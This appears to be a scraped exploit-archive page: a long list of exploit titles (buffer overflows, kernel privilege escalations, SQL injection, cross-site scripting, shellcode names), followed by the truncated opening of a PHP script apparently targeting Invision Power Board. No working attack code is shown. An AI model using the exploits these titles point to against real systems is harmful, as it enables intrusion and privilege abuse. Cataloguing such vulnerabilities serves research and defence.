Buffer Overflow (PoC) wifirxpower - Local Buffer Overflow wifirxpower - Local Buffer Overflow (PoC) pinfo 0.6.9 - Local Buffer Overflow Dmitry 1.3a - Local Buffer Overflow pinfo 0.6.9 - Local Buffer Overflow (PoC) Dmitry 1.3a - Local Buffer Overflow (PoC) Mapscrn 2.03 - Local Buffer Overflow Mapscrn 2.03 - Local Buffer Overflow (PoC) Stunnel 3.24/4.00 - Daemon Hijacking (PoC) Stunnel 3.24/4.00 - Daemon Hijacking Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (PoC) Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1) Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2) Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1) Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (2) Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC) Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator WinZip - MIME Parsing Overflow (PoC) WinZip - MIME Parsing Overflow glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow (PoC) GNU Sharutils 4.2.1 - Local Format String (PoC) glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow GNU Sharutils 4.2.1 - Local Format String GD Graphics Library - Local Heap Overflow (PoC) libxml 2.6.12 nanoftp - Buffer Overflow (PoC) GD Graphics Library - Local Heap Overflow libxml 2.6.12 nanoftp - Buffer Overflow WinRAR 3.4.1 - Corrupt '.ZIP' File (PoC) WinRAR 3.4.1 - Corrupt '.ZIP' File Exim 4.41 - 'dns_build_reverse' Local (PoC) Exim 4.41 - 'dns_build_reverse' Local tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC) Microsoft Windows - NtClose DeadLock (PoC) (MS06-030) Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (PoC) (MS06-030) tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow Microsoft Windows - NtClose DeadLock (MS06-030) Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030) Microsoft Word 2000/2003 - Hlink Local Buffer Overflow (PoC) Microsoft Word 2000/2003 - Hlink Local Buffer Overflow Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC) Cheese Tracker 0.9.9 - Local Buffer Overflow PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow (PoC) PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow (PoC) BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST (PoC) Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow (PoC) PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow (PoC) PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure (PoC) PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation (PoC) Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC) WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055) Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055) Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC) Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC) Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC) DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC) XnView 1.93.6 - '.taac' Local Buffer Overflow OllyDBG 1.10 and ImpREC 1.7f - Export Name Buffer Overflow (PoC) Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC) OllyDBG 1.10 and ImpREC 1.7f - Export Name Buffer Overflow Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution Microsoft Windows Server 2003 - Token Kidnapping Local (PoC) Microsoft Windows Server 2003 - Token Kidnapping Local Debian - Symlink In Login Arbitrary File Ownership (PoC) Debian - Symlink In Login Arbitrary File Ownership Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC) Trend Micro Internet Security Pro 2009 - Priviliege Escalation Atomix Virtual Dj Pro 6.0 - Local Stack Buffer Overflow (PoC) (SEH) Atomix Virtual Dj Pro 6.0 - Local Stack Buffer Overflow (SEH) Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC) Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow (PoC) Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC) GPG2/Kleopatra 2.0.11 - Malformed Certificate Alleycode 2.21 - Local Overflow (SEH) (PoC) Alleycode 2.21 - Local Overflow (SEH) GPG4Win GNU - Privacy Assistant (PoC) GPG4Win GNU - Privacy Assistant VMware Fusion 2.0.5 - vmx86 kext Local (PoC) VMware Fusion 2.0.5 - vmx86 kext Local Mozilla Codesighs - Memory Corruption (PoC) Mozilla Codesighs - Memory Corruption Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC) Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow LDAP - Injection (PoC) LDAP - Injection QuickZip 4.x - '.zip' Local Universal Buffer Overflow (PoC) QuickZip 4.x - '.zip' Local Universal Buffer Overflow ZippHo 3.0.6 - '.zip' Local Stack Buffer Overflow (PoC) Crimson Editor r3.70 - Overwrite (SEH) (PoC) Kenward Zipper 1.4 - Local Stack Buffer Overflow (PoC) ZippHo 3.0.6 - '.zip' Local Stack Buffer Overflow Crimson Editor r3.70 - Overwrite (SEH) Kenward Zipper 1.4 - Local Stack Buffer Overflow Stud_PE 2.6.05 - Local Stack Overflow (PoC) Stud_PE 2.6.05 - Local Stack Overflow Zip Unzip 6.0 - '.zip' Local Stack Buffer Overflow (PoC) Zip Unzip 6.0 - '.zip' Local Stack Buffer Overflow EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow (PoC) EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow Easyzip 2000 3.5 - '.zip' Local Stack Buffer Overflow (PoC) Easyzip 2000 3.5 - '.zip' Local Stack Buffer Overflow PhotoFiltre Studio X - '.tif' Local Buffer Overflow (PoC) Beyond Compare 3.0.13 b9599 - '.zip' Local Stack Buffer Overflow (PoC) PhotoFiltre Studio X - '.tif' Local Buffer Overflow Beyond Compare 3.0.13 b9599 - '.zip' Local Stack Buffer Overflow Shellzip 3.0 Beta 3 - '.zip' Local Stack Buffer Overflow (PoC) Shellzip 3.0 Beta 3 - '.zip' Local Stack Buffer Overflow Audio Converter 8.1 - Local Stack Buffer Overflow (PoC) Audio Converter 8.1 - Local Stack Buffer Overflow Audio Converter 8.1 - Local Stack Buffer Overflow (PoC) ROP/WPM SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC) Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (PoC) (ASLR + DEP Bypass) BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (ASLR + DEP Bypass) Acoustica Audio Converter Pro 1.1 (build 25) - '.mp3 / .wav / .ogg / .wma' Local Heap Overflow (PoC) Acoustica Audio Converter Pro 1.1 (build 25) - '.mp3 / .wav / .ogg / .wma' Local Heap Overflow Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC) Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow (PoC) Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow PHP 5.3.6 - Local Buffer Overflow (ROP) (PoC) PHP 5.3.6 - Local Buffer Overflow (ROP) Xorg 1.4 < 1.11.2 - File Permission Change (PoC) Xorg 1.4 < 1.11.2 - File Permission Change Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - LSA Secrets Linux Kernel 2.2.x - 'sysctl()' Memory Reading (PoC) Linux Kernel 2.2.x - 'sysctl()' Memory Reading Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC) Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation (PoC) Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation HT Editor 2.0.20 - Local Buffer Overflow (ROP) (PoC) HT Editor 2.0.20 - Local Buffer Overflow (ROP) Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read (PoC) Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC) Linux Kernel 2.6 - Console Keymap Local Command Injection ACE Stream Media 2.1 - 'acestream://' Format String (PoC) ACE Stream Media 2.1 - 'acestream://' Format String Linux Kernel 3.13 - SGID Privilege Escalation (PoC) Linux Kernel 3.13 - SGID Privilege Escalation Comodo Internet Security - HIPS/Sandbox Escape (PoC) Comodo Internet Security - HIPS/Sandbox Escape Palringo 2.8.1 - Local Stack Buffer Overflow (PoC) Palringo 2.8.1 - Local Stack Buffer Overflow Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC) Rowhammer - NaCl Sandbox Escape (PoC) Linux Kernel (x86-64) - Rowhammer Privilege Escalation Rowhammer - NaCl Sandbox Escape Fedora 21 setroubleshootd 3.2.22 - Local Privilege Escalation (PoC) Fedora 21 setroubleshootd 3.2.22 - Local Privilege Escalation Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052) Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (MS15-052) Linux (x86) - Memory Sinkhole Privilege Escalation (PoC) Linux (x86) - Memory Sinkhole Privilege Escalation Core FTP Server 1.2 - Local Buffer Overflow (PoC) Core FTP Server 1.2 - Local Buffer Overflow Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051) Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (MS16-051) VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC) VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access Method) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) GNU Screen 4.5.0 - Local Privilege Escalation (PoC) GNU Screen 4.5.0 - Local Privilege Escalation Man-db 2.6.7.1 - Local Privilege Escalation (PoC) Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation (PoC) Man-db 2.6.7.1 - Local Privilege Escalation Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation (PoC) Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC) TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change Multiple CPUs - 'Spectre' Information Disclosure (PoC) Multiple CPUs - 'Spectre' Information Disclosure Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation glibc ld.so - Memory Leak / Buffer Overflow GNU C Library Dynamic Loader glibc ld.so - Memory Leak / Buffer Overflow Microsoft IIS 5.0 - WebDAV Remote (PoC) Microsoft IIS 5.0 - WebDAV Remote Microsoft Windows Server 2000 - RSVP Server Authority Hijacking (PoC) Microsoft Windows Server 2000 - RSVP Server Authority Hijacking ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (4) Titan FTP Server - Long Command Heap Overflow (PoC) Titan FTP Server - Long Command Heap Overflow SLX Server 6.1 - Arbitrary File Creation (PoC) SLX Server 6.1 - Arbitrary File Creation zgv 5.5 - Multiple Arbitrary Code Executions (PoC) zgv 5.5 - Multiple Arbitrary Code Executions Microsoft Internet Explorer - Remote Code Execution (PoC) Microsoft Internet Explorer - Remote Code Execution Exim 4.43 - 'auth_spa_server()' Remote (PoC) Exim 4.43 - 'auth_spa_server()' Remote Microsoft Windows - DTC Remote (PoC) (MS05-051) (2) Microsoft Windows - DTC Remote (MS05-051) (2) Watchfire AppScan QA 5.0.x - Remote Code Execution (PoC) Watchfire AppScan QA 5.0.x - Remote Code Execution KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow (PoC) KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (2) Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (MS06-005) (2) RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow (PoC) RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow AIM Triton 1.0.4 - 'SipXtapi' Remote Buffer Overflow (PoC) AIM Triton 1.0.4 - 'SipXtapi' Remote Buffer Overflow Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC) Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution Easy File Sharing FTP Server 2.0 - 'PASS' Remote (PoC) Easy File Sharing FTP Server 2.0 - 'PASS' Remote BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC) BulletProof FTP Client 2.45 - Remote Buffer Overflow Intel Centrino ipw2200BG - Wireless Driver Remote Overflow (PoC) Intel Centrino ipw2200BG - Wireless Driver Remote Overflow WebMod 0.48 - Content-Length Remote Buffer Overflow (PoC) WebMod 0.48 - Content-Length Remote Buffer Overflow OpenBSD - ICMPv6 Fragment Remote Execution (PoC) OpenBSD - ICMPv6 Fragment Remote Execution Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027) Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027) Apple Safari 3 for Windows Beta - Remote Command Execution (PoC) Apple Safari 3 for Windows Beta - Remote Command Execution Flash Player/Plugin Video - File Parsing Remote Code Execution (PoC) Flash Player/Plugin Video - File Parsing Remote Code Execution Apple QuickTime (Multiple Browsers) - Command Execution (PoC) Apple QuickTime (Multiple Browsers) - Command Execution Apple QuickTime /w IE .qtl Version XAS - Remote (PoC) Apple QuickTime /w IE .qtl Version XAS - Remote QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow (PoC) QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC) ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method (PoC) HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting (PoC) Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC) MicroTik RouterOS 3.13 - SNMP write (Set request) Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC) Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC) Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution Opera 9.61 - 'opera:historysearch' Code Execution (PoC) Opera 9.61 - 'opera:historysearch' Code Execution Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC) Chilkat Crypt - ActiveX Arbitrary File Creation/Execution Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069) Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069) Google Chrome 1.0.154.46 - '(ChromeHTML://)' Injection (PoC) Google Chrome 1.0.154.46 - '(ChromeHTML://)' Injection GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption (PoC) GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002) Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002) Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC) Zervit Web Server 0.4 - Directory Traversal / Memory Corruption Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2) Apple Mac OSX - Java applet Remote Deserialization Remote (2) VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow (PoC) VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054) Microsoft Internet Explorer 5/6/7 - Memory Corruption (MS09-054) Pegasus Mail Client 4.51 - Remote Buffer Overflow (PoC) Pegasus Mail Client 4.51 - Remote Buffer Overflow TLS - Renegotiation (PoC) TLS - Renegotiation Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC) Trend Micro Web-Deployment - ActiveX Remote Execution (PoC) Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution Trend Micro Web-Deployment - ActiveX Remote Execution MX Simulator Server - Remote Buffer Overflow (PoC) MX Simulator Server - Remote Buffer Overflow Apache OFBiz - Remote Execution (via SQL Execution) (PoC) Apache OFBiz - Admin Creator (PoC) Apache OFBiz - Remote Execution (via SQL Execution) Apache OFBiz - Admin Creator Adobe Flash / Reader - Live Malware (PoC) Adobe Flash / Reader - Live Malware Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Remote Buffer Overflow (PoC) Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Remote Buffer Overflow KingView 6.5.3 - SCADA HMI Heap Overflow (PoC) KingView 6.5.3 - SCADA HMI Heap Overflow Microsoft Data Access Components - Remote Overflow (PoC) (MS11-002) Microsoft Data Access Components - Remote Overflow (MS11-002) HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC) HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC) HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC) Solar FTP Server 2.1.1 - PASV Buffer Overflow Apache mod_proxy - Reverse Proxy Exposure (PoC) Apache mod_proxy - Reverse Proxy Exposure Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite (PoC) Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite (PoC) Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution (PoC) Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution OpenVAS Manager 4.0 - Authentication Bypass (PoC) OpenVAS Manager 4.0 - Authentication Bypass w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC) w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution Legend Perl IRC Bot - Remote Code Execution (PoC) Legend Perl IRC Bot - Remote Code Execution dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock) dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock) WebDrive 12.2 (Build #4172) - Remote Buffer Overflow (PoC) WebDrive 12.2 (Build #4172) - Remote Buffer Overflow Endian Firewall < 3.0.0 - OS Command Injection (Python) (PoC) Endian Firewall < 3.0.0 - OS Command Injection (Python) Fortigate OS 4.x < 5.0.7 - SSH Backdoor Access OpenSSHd 7.2p2 - Username Enumeration (PoC) OpenSSHd 7.2p2 - Username Enumeration Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution Intel Active Management Technology - System Privileges Xplico - Remote Code Execution (Metasploit) Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution S9Y Serendipity 0.7-beta1 - SQL Injection (PoC) S9Y Serendipity 0.7-beta1 - SQL Injection AWStats 5.7 < 6.2 - Multiple Remote (PoC) AWStats 5.7 < 6.2 - Multiple Remote WoltLab Burning Book 1.1.2 - SQL Injection (PoC) WoltLab Burning Book 1.1.2 - SQL Injection Invision Power Board 2.1.7 - ACTIVE Cross-Site Scripting / SQL Injection Invision Power Board (IP.Board) 2.1.7 - 'ACTIVE' Cross-Site Scripting / SQL Injection EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC) EQdkp 1.3.2f - 'user_id' Authentication Bypass Invision Power Board 2.3.5 - Multiple Vulnerabilities (2) Invision Power Board (IP.Board) 2.3.5 - Multiple Vulnerabilities (2) FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC) FOSS Gallery Public 1.0 - Arbitrary File Upload Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC) Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC) Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation Invision Power Board 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure Invision Power Board (IP.Board) 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC) Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption IPB (nv2) Awards < 1.1.0 - SQL Injection (PoC) IPB (nv2) Awards < 1.1.0 - SQL Injection X-Cart Pro 4.0.13 - SQL Injection (PoC) X-Cart Pro 4.0.13 - SQL Injection Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute (PoC) Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute IPB 3.0.1 - SQL Injection Invision Power Board 3.0.1 - SQL Injection WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC) WebsiteBaker 2.8.1 - Cross-Site Request Forgery BS Auto Classifieds - 'info.php' SQL Injection (PoC) BS Business Directory - 'articlesdetails.php' SQL Injection (PoC) BS Classifieds Ads - 'articlesdetails.php' SQL Injection (PoC) BS Events Directory - 'articlesdetails.php' SQL Injection (PoC) BS Auto Classifieds - 'info.php' SQL Injection BS Business Directory - 'articlesdetails.php' SQL Injection BS Classifieds Ads - 'articlesdetails.php' SQL Injection BS Events Directory - 'articlesdetails.php' SQL Injection BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC) BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account) (PoC) Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account) SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC) SWAT Samba Web Administration Tool - Cross-Site Request Forgery Plone and Zope - Remote Command Execution (PoC) Plone and Zope - Remote Command Execution Invision Power Board 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting Invision Power Board (IP.Board) 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting Invision Power Board 1.x - 'index.php' showtopic Cross-Site Scripting Invision Power Board (IP.Board) 1.x - 'index.php' showtopic Cross-Site Scripting Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities Invision Power Board (IP.Board) 1.3 - Multiple Cross-Site Scripting Vulnerabilities Invision Power Board 1.3 - 'Pop' Cross-Site Scripting Invision Power Board (IP.Board) 1.3 - 'Pop' Cross-Site Scripting Invision Power Board 1.3 - 'SSI.php' Cross-Site Scripting Invision Power Board (IP.Board) 1.3 - 'SSI.php' Cross-Site Scripting Invision Power Services Invision Board 2.0.4 - Search Action Multiple Cross-Site Scripting Vulnerabilities Invision Power Board (IP.Board) 2.0.4 - Search Action Multiple Cross-Site Scripting Vulnerabilities Invision Power Board 1.x/2.0.3 - SML Code Script Injection Invision Power Board (IP.Board) 1.x/2.0.3 - SML Code Script Injection IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover Invision Power Board 1.x?/2.x/3.x - Admin Account Takeover Invision Power Board 2.0.3/2.1 - 'Act' Cross-Site Scripting Invision Power Board (IP.Board) 2.0.3/2.1 - 'Act' Cross-Site Scripting Invision Power Board 1.0.3 - Attached File Cross-Site Scripting Invision Power Board (IP.Board) 1.0.3 - Attached File Cross-Site Scripting Invision Power Services Invision Board 2.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities Invision Power Board (IP.Board) 2.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities Invision Power Services Invision Board 2.0.4 - 'index.php?st' Cross-Site Scripting Invision Power Board (IP.Board) 2.0.4 - 'index.php?st' Cross-Site Scripting Invision Power Services Invision Board 2.0.4 - Calendar Action Multiple Cross-Site Scripting Vulnerabilities Invision Power Board (IP.Board) 2.0.4 - Calendar Action Multiple Cross-Site Scripting Vulnerabilities Invision Power Services Invision Board 2.0.4 - Print Action 't' Cross-Site Scripting Invision Power Services Invision Board 2.0.4 - Mail Action 'MID' Cross-Site Scripting Invision Power Services Invision Board 2.0.4 - Help Action 'HID' Cross-Site Scripting Invision Power Board (IP.Board) 2.0.4 - Print Action 't' Cross-Site Scripting Invision Power Board (IP.Board) 2.0.4 - Mail Action 'MID' Cross-Site Scripting Invision Power Board (IP.Board) 2.0.4 - Help Action 'HID' Cross-Site Scripting Invision Power Board 1.x/2.x - Multiple SQL Injections Invision Power Board (IP.Board) 1.x/2.x - Multiple SQL Injections Invision Power Board 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities Invision Power Board (IP.Board) 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting Invision Power Board (IP.Board) 3.0.3 - '.txt' MIME-Type Cross-Site Scripting IP Board 3.x - Cross-Site Request Forgery / Token Hjiacking Invision Power Board (IP.Board) 3.x - Cross-Site Request Forgery / Token Hjiacking Invision Power Board 4.2.1 - 'searchText' Cross-Site Scripting Invision Power Board (IP.Board) 4.2.1 - 'searchText' Cross-Site Scripting TOTOLINK Routers - Backdoor / Remote Code Execution (PoC) TOTOLINK Routers - Backdoor / Remote Code Execution IP.Board 4.x - Persistent Cross-Site Scripting Invision Power Board (IP.Board) 4.x - Persistent Cross-Site Scripting IP.Board 4.1.4.x - Persistent Cross-Site Scripting Invision Power Board (IP.Board) 4.1.4.x - Persistent Cross-Site Scripting NETGEAR R7000 - Command Injection (PoC) NETGEAR R7000 - Command Injection WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass / SQL Injection WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass / SQL Injection Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration Photos in Wifi 1.0.1 - Path Traversal SonicWall NSA 6600/5600/4600/3600/2600/250M - Multiple Vulnerabilities FiberHome LM53Q1 - Multiple Vulnerabilities WordPress Plugin LearnDash 2.5.3 - Arbitrary File Upload Vanilla < 2.1.5 - Cross-Site Request Forgery Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE (PoC) Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE Joomla! 3.7.0 - 'com_fields' SQL Injection (PoC) Joomla! 3.7.0 - 'com_fields' SQL Injection Apache Struts 2.3.x Showcase - Remote Code Execution (PoC) Apache Struts 2.3.x Showcase - Remote Code Execution AIX - execve /bin/sh Shellcode (88 bytes) Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)
1745 lines
No EOL
42 KiB
PHP
1745 lines
No EOL
42 KiB
PHP
#!/usr/bin/php -q
|
|
<?php
|
|
error_reporting(E_ALL ^ E_NOTICE);
|
|
|
|
# yeah ... it rox (:
|
|
class ipb_spl
|
|
{
|
|
var $web;
|
|
|
|
function main()
|
|
{
|
|
